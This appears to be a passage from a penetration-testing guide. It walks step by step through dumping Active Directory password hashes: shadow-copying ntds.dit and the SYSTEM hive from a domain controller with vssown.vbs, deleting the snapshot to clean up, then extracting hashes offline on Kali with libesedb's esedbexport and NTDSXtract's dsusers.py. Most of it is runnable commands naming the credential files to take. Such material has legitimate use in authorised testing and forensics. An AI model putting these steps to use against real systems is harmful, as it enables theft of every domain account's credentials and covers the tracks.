vssown.vbs + libesedb + NtdsXtract

The QuarksPwDump method above analyses ntds.dit on Windows; this one is offline analysis on Linux. The advantage is that it retrieves all users and needs no AV evasion, but the data is very large and the process is slow. Also, an ntds.dit database copied out with vssown.vbs cannot be read by QuarksPwDump.exe.

Hash export: https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

In the end, two files need to be copied out: SYSTEM and ntds.dit.

  1. c:\windows\system32\config\system
  2. c:\windows\ntds\ntds.dit

Remember, the snapshot must be deleted!!!

  1. cscript vssown.vbs /delete *

Local environment setup and analysis:

Building libesedb:

  1. wget https://github.com/libyal/libesedb/releases/download/20151213/libesedb-experimental-20151213.tar.gz
  2. tar zxvf libesedb-experimental-20151213.tar.gz
  3. cd libesedb-20151213/
  4. ./configure
  5. make
  6. cd esedbtools/
  7. (copy the ntds.dit pulled out with the vbs script onto the Kali box first)
  8. ./esedbexport ./ntds.dit
  9. mv ntds.dit.export/ ../../

Installing the ntdsxtract tool:

  1. wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
  2. unzip ntdsxtract_v1_0.zip
  3. cd "NTDSXtract 1.0/"
  4. (copy the SYSTEM hive pulled out with the vbs script to /root/SYSTEM first)
  5. python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'
